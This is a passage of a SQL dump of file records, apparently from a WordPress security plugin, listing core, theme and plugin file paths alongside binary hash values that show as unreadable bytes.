rki-fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�D�~����4�:','Z�y�P�X7�wg6Rz��4�^�l���O','',0,'?'),('{�4�O;{\'$2dț�O','wp-content/themes/twentytwenty/inc/starter-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y)G�.�\'','5H?%��)�JzI<Y�6�WJ2�I���d�','',0,'?'),('{�Z�e�!1��E��!','wp-content/themes/hueman/functions/theme-options.php',0,'i����)h��%��','i����)h��%��',')�T�H�\n�Td��+�P����~�G�a�','',0,'?'),('{�@�\Z�3i�[Ȁ�>','wp-includes/wp-includes/class-wp-customize-manager.php',0,'-@�{�p\r���9�u','-@�{�p\r���9�u','O�PZ�y�s��6��z��r�4�QN�k��','',0,'?'),('{ؼ\0�C0q<�3,e*/�','wp-content/themes/auberge/library/controls/class-WM_Customizer_Select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��П�v�� t��7�>','tp�n([�G.���k�8��/(36�uZ\"_^','',0,'?'),('{uo���\r /dM}','wp-content/themes/sg-window/inc/js/portfolio-nav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ެd-H�jMY��e3','�ښ����\0��ɺU*�4=����qH ����=�','',0,'?'),('{�1�9�+sh���','wp-content/plugins/wp-cerber/assets/flags/gp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CG_t?���9�rK','��hd0)m�3�a�ͱQ�D�V�����}�','',0,'?'),('{�-mY1�%$���Y�','wp-content/themes/travel-stories/trvlstrs-nothingfound.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\"b&�WDT��kQK�','j��Jzb[��@��ҷ�B\"�tؑ��{','',0,'?'),('{�RC��\Z�.*\"�Q','wp-includes/feed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z2�j��(=iSM�IV�','\Z�/������\'\\��.�� 7�����3','',0,'?'),('{�\r�-��}�^��','wp-includes/images/smilies/frownie.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���������','r�~�Dzo�h߱�����ػ\">E�+�Ke�','',0,'?'),('{���?���\r��\n\'','wp-admin/images/imgedit-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\\2���}�G�i;O','T�N�~��-�@��N��̞V�\\��(u$��','',0,'?'),('|j��x7�(Q}�0�\'�','wp-admin/css/list-tables.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����~FՕ��','H,=�!B�=�?��Op`K˄�`�^�y!���','',0,'?'),('|�}�h�Aw|��[�H ','wp-content/themes/fastblog/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�<�5P�_�&�','YO�o�؋���Lc>��eƳ�x7$B\0��d�','',0,'?'),('|\rq�m|4 �I�','wp-content/themes/anima/cryout/framework.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=ݯ��n�0��r�','m7V�7~ϥR��IY7��E����bϩLK�~','',0,'?'),('|\rl?D_�m�d� Y�x','wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&D�_F#�I!���','�R��g����[>{��e�\n�ژx�1��R�','',0,'?'),('|-����z��-�','wp-admin/export-personal-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xh�v�iy��.��','C~S����|��8R�wK@�_�J��m�','',0,'?'),('|/ڒ�\0[*4��x��','wp-includes/js/admin-bar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�c����@p�','t���bIld�\n�Lb�x+�ϔ�j䶪,�J\0\r$2','',0,'?'),('|9���L�H͜��̏�','wp-content/themes/promote/js/unminified/jquery.easing.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��O>=#͈���','.<��콋��h;s�6�ʸ�]Z�2��`$m�','',0,'?'),('|N!�;x�N&�g��m�','wp-admin/js/widgets/media-image-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G9�Fm�qQ��','J�6�%V��\"�\rK�yɳ�h���8�N�����F','',0,'?'),('|VF��u�i]�\\Vق','wp-content/themes/showcase-lite/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nuD&:�.�vYP5�','�����G�.}�fWxY|����t�F]����','',0,'?'),('|\\~S���Oj���/�t','wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php',0,'X��U iU0�ll9�c','X��U iU0�ll9�c','��_�v$�U7_�*\r?�+�^��≾�Ā','',0,'?'),('|a�i)ݣ�}��3�','wp-includes/wp-includes/class-wp-site-query.php',0,'*Wy�\ng�MP��)�p1','*Wy�\ng�MP��)�p1','���C�ƙ&���v����\"�[�SK@� ��Π@','',0,'?'),('|l�+F��#ڟ�����','wp-includes/class-wp-user-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�?�v��\\����$','z����.t(���C�o��� ���tV�','',0,'?'),('|p6: �W��S76P[�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-filed-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!.ξ�������','13� �=�>���zk/��&�ڍ|��\ZR�]�','',0,'?'),('|q�\"�]M���D��-','wp-content/themes/showcase-lite/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\"���AQ�=H-�1','/�Z2Sw5�_(a�H^\\_����$�@]�S�#Ϸ','',0,'?'),('|��\\w�4�ѸQj���','wp-includes/wp-includes/images/crystal/video.png',0,'���l��ڤ�;�=','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('|�� �4�x�\\��M�n','wp-admin/js/code-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D&fAД��E��~','{���h;[�5��0` Vz��Kd�����^,h�','',0,'?'),('|��t&�Ұ����C>�','wp-content/themes/hueman/assets/front/img/demo/9-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�O���tT��!�\Z','��:s�#�����w��aSp����c�u��','',0,'?'),('|���͉5l����$��]','wp-includes/wp-includes/js/tinymce/plugins/image/plugin.js',0,'�B�\n�4�\\��0�=','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('|�w8��P~��w�+w�','wp-content/themes/auberge/library/css/customize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vp\'PK�ߪ���:�)�','�c9Lq\n�&��N̨���LH�*r�[�/�','',0,'?'),('|š�u��_�\0cx�6�','wp-content/themes/advance/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%J��[U˅V��o6','ϕ�|����XY�N��l��(� ���Z��;��','',0,'?'),('|��@zmc�پAx��t','wp-content/themes/pine/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z4>��dw,W�Hs','~8ژ�%E�:j0�!씡7H/JM\n@��\"�$�','',0,'?'),('|��[r2*�1��{Dl�','wp-content/themes/gambit/inc/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EނB��qG�*y��x�','hX\0�5���\\��� ���Uؓ��o�9qE*��N','',0,'?'),('|����f�lG��P�.','wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\"W:]��`A\"e�:�Ս','�&�?�~����ur��4�Ў�[����z^','',0,'?'),('|��T]��:Y$=\'h�','wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��Gy�d�7?��_�','�3�7!��|�����%�e��k�6XL','',0,'?'),('|��,��Q����w�[','wp-includes/wp-includes/js/jquery/ui/effect-fade.min.js',0,'���*Bz��L��','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('|��Y�>�� �Ɔ�','wp-admin/link-add.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�!\'ljP��^kI��','�5:���q��φR_\\y���h�\rLIl���','',0,'?'),('}����O$�>/gWV','wp-content/themes/newsmag/inc/admin/welcome-screen/img/macho-themes-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a��4�\Z�x�N���','����V�ͯu��#�n����T\Z��^é�','',0,'?'),('}ĉ=�t�����','wp-includes/images/toggle-arrow-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F���\\����CDr�','-��N������7~@�}�_�=���V�_@A�','',0,'?'),('})��V�7�]wc���','wp-includes/wp-includes/js/wp-custom-header.js',0,'+,�!�ڊLӺ~ν7�','+,�!�ڊLӺ~ν7�','��E�zk;3K�*X$���i���q��n��','',0,'?'),('}.�s�ؠ<B ��s','wp-includes/wp-includes/SimplePie/Exception.php',0,'逗z�qŔ��/��','逗z�qŔ��/��','_pe�NO�/�*�mv��ȿ�n6*��zo��n�','',0,'?'),('}C�B��-u�H�}�','wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php',0,'3°�\nᄷ�\0�a��','3°�\nᄷ�\0�a��','` \\XO�U>8X.�f��?��m�{\nQ]�8��','',0,'?'),('}L;��],����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,(�[�\0�b��۪��z','�)�Y|\nA0a���\r�%in���ߞkMjC\'��','',0,'?'),('}N�1�K�\n�S�0\0�','wp-includes/wp-includes/blocks/block.php',0,'��i8��X�3����cTD','��i8��X�3����cTD','�J���$_�F�$o�����{�fC�~L�3��<','',0,'?'),('}O� !ٶ]�O�O[�','wp-includes/block-supports/typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��veY�\Z��f�','�B��tٯ�@�^���5��N���XȆ<','',0,'?'),('}\\�5�\r��$�l�W���','wp-admin/js/tags-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��D��B�aB�*','$Y�Xx��93%��ftC0y�,�^���\n','',0,'?'),('}]�v�b�Z~n��:��','wp-includes/wp-includes/Requests/Exception/HTTP/501.php',0,'eڸ04�-?��ב�5','eڸ04�-?��ב�5','�k�G寲�\nCD#�6�u\Z�քEڣ@K1','',0,'?'),('}`��g\"P�2��V��','wp-includes/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6����� B��4�6','',0,'?'),('}������z�L�','wp-content/themes/hueman/assets/front/img/sidebar/s-right-dual-full-collapse.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Hp뀸��˴��','�h�F}�� ���0/ t������M����','',0,'?'),('}��)6��9<^�$J5�','wp-content/themes/advance/inc/kirki/assets/scss/controls/code.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�XS㝵���ۺs','Z�Qs��[��{�\\?�p�t֑]|���U-�e','',0,'?'),('}�7 ޘ�DHD�Pl','wp-includes/SimplePie/Registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\���S8�X�`Yt','5\n֚�8��q�W��@��C�HҘ���\\eg','',0,'?'),('}��Nտo�p�ꛥ!','wp-includes/wp-includes/js/thickbox/thickbox.css',0,'7��P�R�n�,(�f�','7��P�R�n�,(�f�','M�ߍ��V�_�^����ol\'\0��qYL�̘)���','',0,'?'),('}�HJ�1�%�`��','wp-content/themes/twentytwenty/template-parts/modal-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#g��:�N6Ȱ\\qW','�� ^+z:%,��1z�(�\Z�\'|��T�9��J','',0,'?'),('}�l}%CK�c}�NH��\Z','wp-content/plugins/wp-cerber/assets/flags/gr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\0�$��*0B�֏*�','����,DZ��W?������l�G��k��Qq','',0,'?'),('}��Ζ#�W�}��T8','wp-content/themes/newsmag/assets/images/banner-placeholder.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Lp��J!H���ۏ\"�','��=^���ɋ3R����h&L\0�a\nj��l�A�','',0,'?'),('}��1��SJr��','wp-content/themes/advance/inc/kirki/includes/class-kirki-field.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%\n�)r:�%���O�',' -��?ON���[����\'�B�\Z������n','',0,'?'),('}�Ȑ�\\L��`���i)','wp-includes/ID3/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GؐV%�P_��շ�','�I>��a�*R8?�)�p1�U͔�?2�=o��','',0,'?'),('}����=\"$�x���','wp-content/plugins/wp-cerber/assets/flags/si.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E����z|9�','��ո����� +���}x͐�侟�?#���','',0,'?'),('}���{RҢ���\"','wp-includes/default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����f\n��G8��','��/�R�5ڍC,�i�K�f�}���\\4/\0��','',0,'?'),('~w�%w��0���X�','wp-content/themes/wp-barrister/library/images/profile-default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�_�R��[ӽ���','�-b�rQ��|�����i��z��)�E؆ W','',0,'?'),('~Ⱦ/�m�ր�!��','wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���e4�/����','p�f*�p�m$�F���tw��F��x?�.','',0,'?'),('~��\\��_b�$�-��!','wp-includes/js/jquery/ui/selectable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!9�qf��H7�{B,�z�','W�b��v�(��F4��S�]���@Ĕ�ܾ�','',0,'?'),('~ A�@�[�����','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-info-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�@�C�U�h�R~\\:','�^\Z�g�(�p(\n��!\"�ͭBy�E\"3;σ�','',0,'?'),('~#\0.��\r�s�з\Z4�0','wp-content/themes/advance/inc/images/cross.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6#�v����E�E\\\n4','7_6�>8��}�{��r�й���,���oR\'','',0,'?'),('~)� ��=\\�$:DZ��','wp-content/themes/hueman/assets/front/img/sidebar/s-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�\"c�7d�[9���','�!t��u�;[/)�y\\U�Y����O(f}��.','',0,'?'),('~?�J�I�b*�e�C','wp-admin/images/resize.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN������','�6��&?�5��?s�qGM`P;','',0,'?'),('~A�H�g��KT��','wp-includes/Requests/Utility/CaseInsensitiveDictionary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:��R�K�ro�H2z','9yԆ&/AX�H�i{b���7f���rw���=m','',0,'?'),('~F��㫎>dy��j�','wp-includes/css/jquery-ui-dialog-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�+x)���A�v6@�@','�/��N��e$�������2:.�}b#�K}','',0,'?'),('~S���ԟU8��-P6�','wp-content/themes/hueman/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6_�Վ�6�K�O',' �h��G��碻�L���F��UX�(�`�_s�','',0,'?'),('~V��Xa]�7p�|R','wp-includes/class-wp-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1$�%�:��I�:��','P댭���t\\V�ܛ&��T���\Zݝ�^6�','',0,'?'),('~i�I�;ݭ]�A��S','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','54��⓿�`�����','D��Oo;o�O]+�\0���5�]/\"�&�Q�','',0,'?'),('~q�IP�I���r��','wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-\\�d��oG��\n��2','Sa)����ʗn&B��V�~��11�\'w�(','',0,'?'),('~x�S���1+�k�6�V�','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-radio-buttonset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�ǣ������\0�<�','(%��O �CW��I�VXV����29�_��\\�','',0,'?'),('~}�{ ��>D�}�<','wp-admin/css/code-editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�3�;�7��v:�P���','JlA��Z��q��F�v�<3�I^��k�','',0,'?'),('~��ReOX�f2��`�','wp-includes/class-wp-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;@A��[�oh�́F�','Bms������AKE)(|-�c����ϡ�|��d','',0,'?'),('~�>��r����:M\Z','wp-content/themes/Endolf/inc/featured.php',0,'iۿ6�SP\'��GQ','iۿ6�SP\'��GQ','��g|���D�f�����W���[�ٸi@�','',0,'?'),('~�#Sp��#Zt�i','wp-content/themes/spidermag/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x>��8Z�t*��n\Z!','Ea���n������q�A���0sN�E/�)�.','',0,'?'),('~���v[�}�����','wp-includes/wp-includes/Requests/Exception/HTTP/404.php',0,'��c�Y\0�ys��<M','��c�Y\0�ys��<M','��-!V��>d�*jP�F� �;QƵ��N1aG�(','',0,'?'),('~�x�J�U_<m����n','wp-includes/wp-includes/js/tinymce/utils/editable_selects.js',0,'�J��q2��I\'�J�9�E','�J��q2��I\'�J�9�E','�v��Gjs��f�� e�d�&�g��+���','',0,'?'),('~����;dI�\"6k�I�','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Yo��i�`Qt','��ſ�ށ;�G��\r\r�n����l��\r���','',0,'?'),('~��G�#��h᷉_�','wp-content/themes/advance/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��&����\\�\\և',' ���ظ�b+�;�� �Ůyy@>%R=�y�3','',0,'?'),('~��`�Wj��|iLI=��','wp-content/themes/twentynineteen/sass/site/primary/_archives.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�jq�@�hD�)��r','�h����o3U� ��~���n6��>i~�M#','',0,'?'),('~ť�s\0�1y�$�L}h','wp-config-sample.php',0,'�S�Ӌ���h��1����','�S�Ӌ���h��1����','ꐐd`�4�� �\\X��L�u��$dž��Ũdb','',0,'?'),('~�Ӹbc��\Z$�@$��*','wp-content/plugins/wordfence/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+>r*������mI','E��\0�.�����¿¯�1F�(Df�u�v��˔','',0,'?'),('~ܶ~��`��O\n�5�:�','wp-content/themes/cactus/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m:�\rTCش͠','�#��5R�ƀ�TT\n�L�ZI���y{t��d�J','',0,'?'),('~��^��%���A�','wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��8@I�z}��g��','�w][�fv\\mS����^�F\rsd���~�\'��','',0,'?'),('~�J�-��a뜄jF��','wp-includes/wp-includes/widgets/class-wp-widget-calendar.php',0,'�Y N��ɔ]7l�','�Y N��ɔ]7l�','M�>����f(E���r_hX���oۃ��8@�+O','',0,'?'),('Z\nf/����(����','wp-content/themes/showcase-lite/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%����j��_��W��','Lf����H��QN<��M9��Т\'�p��F�','',0,'?'),('\r��F)��F��B�<��','wp-content/themes/advance/inc/admin/welcome-screen/welcome-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �Xi�.\\�:�^����','��J0��� I_��J���s�i�izf�\'J�d�','',0,'?'),('�ldK�м����','wp-includes/js/dist/components.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��Z��\'%R�l�','ho]�9�O��D^;Lf�u������{','',0,'?'),('!��u�u�%�����','wp-content/themes/spidermag/assets/images/classicpost.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u:Hr��2�D��','YU�)��T\r\"a�� +�z�~͚|ȋa�q��','',0,'?'),('\' M�2���%� ��','wp-includes/wp-includes/js/jquery/ui/selectmenu.js',0,'o�x� eqd���$I','o�x� eqd���$I','\r���Ė)�UoG��iލ����oP�(','',0,'?'),('0u�R��D��{�1�','wp-content/plugins/wp-cerber/assets/flags/cg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��K����*�A4�@T$','��Ŕ���wEi�av�A}z�[ɵ�7�6C','',0,'?'),('6\0�O�kvzfTN','wp-includes/js/jquery/ui/effect-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}:h�B�կ}z�x�','�����n�\r�S�/<���b���ե]Na�','',0,'?'),('@�={&����}�_','wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}=���v�!ʸ�M','6iV��a#^n�gv�}]����@\"�ǥ{','',0,'?'),('A(Ti�_�*�nt���','wp-content/themes/vision-lite/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�E�)$�!����^a_','�xu\n6[z�x��ek}-�)�tٗ�nW�','',0,'?'),('E��o�aQ���l]','wp-content/themes/spidermag/spidermag/core/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�r�X�[���F�;','#4:)\Zo�lPTh`�� t��.��\'�','',0,'?'),('M����ӝ<\"�a��','wp-content/themes/storeone/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˯ٮ���K�Z�*','�( X�\ZC�ݔ��%�R86�%$#���K��','',0,'?'),('T+� l��!�*�Ĺ','wp-content/themes/wp-barrister/library/images/icon-li.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1��8�r��/','o[���Z �� $\'��/��V��ǜ���','',0,'?'),('j&��^���b����','wp-includes/ms-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ĉ�L�@�r#�}S���','4n-���J���2����T�hߕ�!�_H/Z\"�','',0,'?'),('j^��SN�-O� �','wp-includes/css/dist/components/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!���{9���YV?\'7�','���f�4qS�� \\���\'��~v���\Z�h�','',0,'?'),('j���)Vk��9���','wp-content/themes/twentytwentyone/assets/js/customize-helpers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�7$I��t�','�-<ݵ~���(�H�6lPLn�M�By����','',0,'?'),('tS�\"��lZ�c��Q','wp-admin/js/auth-app.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qi����~[�|\r�S','A�|f��K�\Z���F|���eɠL�e��ܬ�49','',0,'?'),('w�R1�[��P�B���z','wp-content/plugins/wp-cerber/assets/flags/rs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����H]��el_L�S','9qp���p~##�7b���o����/�j|�bLl�','',0,'?'),('w�\'�Pe��F�+��V\0','wp-includes/Requests/Proxy/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/2��������)','J�6d��A��l{��Й\0������J��h','',0,'?'),('����oȂ�/ \"Y}','wp-includes/wp-includes/js/tinymce/tinymce.min.js',0,'Xl����̡C��kn','Xl����̡C��kn','�Zk� �6|��{�*\Z��{�H����iܝk^','',0,'?'),('�8R��Bo.�~iK��','wp-content/themes/anima/admin/images/2cSl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�S{m�`Z�;�','La�2Nӥ�]���)1��&��>^C�2�$�','',0,'?'),('�m{8���]�ך��<','wp-content/plugins/wp-cerber/assets/flags/de.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����NJ&z\\ҿ~��i','�Ū3�J��:2;��;�����p�J�kL~�','',0,'?'),('����w��_gB�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',0,'�f\"����#6${ JL\'\"','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('�1I9j$(�~��]l�','wp-content/themes/showcase-lite/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=��,:��T6`��wS','N��t�]b|Ձ���d\Z���\0;UG�^���t�&','',0,'?'),('��\0�w�夹�~','wp-content/themes/capacious/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Jf]� f�$M��','L�8y��U�Zyr�����Ee�!�����iZq�F�q','',0,'?'),('���eP�Mde���','wp-includes/wp-includes/registration.php',0,'���S��D��31�','���S��D��31�','ՙ���vF��٫���P��B8.�����8�','',0,'?'),('��%G]f�@�%�Z��','wp-content/plugins/wordfence/views/common/section-subtitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�c��D��Ã��۬','Z�J��wsh5�M�����Eu/jg�[���-�','',0,'?'),('�(9O)O˄0�J��','wp-includes/wp-includes/js/wp-sanitize.js',0,'���:k���E�t6Q��','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('�СqD֚?�i�X','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r��!(�i.+�)Қ�\"{','�Z�Q[���Q���G����7��؍E\"�','',0,'?'),('�K�Q�}U&;&���Q','wp-includes/meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6y��w���N�ш','���W!�\Zس-�Y��}����M��W�e?','',0,'?'),('�P��=�8�[��1','wp-content/themes/weblog/acmethemes/customizer/header-options/header-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����he','\n�wl�1�@q���s� \0/�ϱ�3���p� ','',0,'?'),('�tr�εF_� ���','wp-includes/js/wp-emoji-loader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hn�1e��胖��S�','�,H���w�0�����N<��l�\n�����!��','',0,'?'),('�͍�����ρb�B','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|DZ(���r��q֧#','�)0������+���^h��v.(��>����','',0,'?'),('� tI��Ǵ=\r�n��','wp-includes/wp-includes/js/jquery/jquery.hotkeys.js',0,'j��hI�QLZA$Un�H�','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('� iT��#��OL���','wp-content/themes/auberge/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��T�+�*�\Z\n�S�`','Q�L�p�Ry�뉁P��\0g��\'��۶[H\0Ge','',0,'?'),('�/�����|��w','wp-content/themes/spidermag/assets/images/screenwidthpost.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AE�7���rb��l\0','��N<D�4)��E�^@8o�-�7�Z�{��','',0,'?'),('�3-�����f��\n','wp-includes/css/dist/list-reusable-blocks/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AU�L�Y����M��','�)�RfZ�����~u3����}\'�?�!>','',0,'?'),('�;��!1�>�Y�xQ�','wp-includes/js/dist/block-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BQ�e!��J%�q��','�&#\'��/�;y6՞�%��чqedq�7W�','',0,'?'),('�>�;:��Tĉ�<mEK4','wp-content/themes/pine/template-parts/content-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��RR[s�9D��','\0�#�#�8���W��Z��L�4�H}~3�z�\r�_','',0,'?'),('�Eћ�Pa\r����:�','wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',0,'��h���P���','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('�Mߋ,��/�B]WX\Z�','wp-includes/wp-includes/taxonomy.php',0,'�5��H\nC8h��:��N','�5��H\nC8h��:��N','I�\r�u}�����Yw�Su:<IF���','',0,'?'),('�p\\�>trqӿ�aK�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�i�u��n�6���','k�\'��z���Lzm��\rg�gKj_r�e�i躞','',0,'?'),('�q�A�}��.��x��4 ','wp-content/themes/advance/css/jquery.sidr.dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y̅�v���5v�� 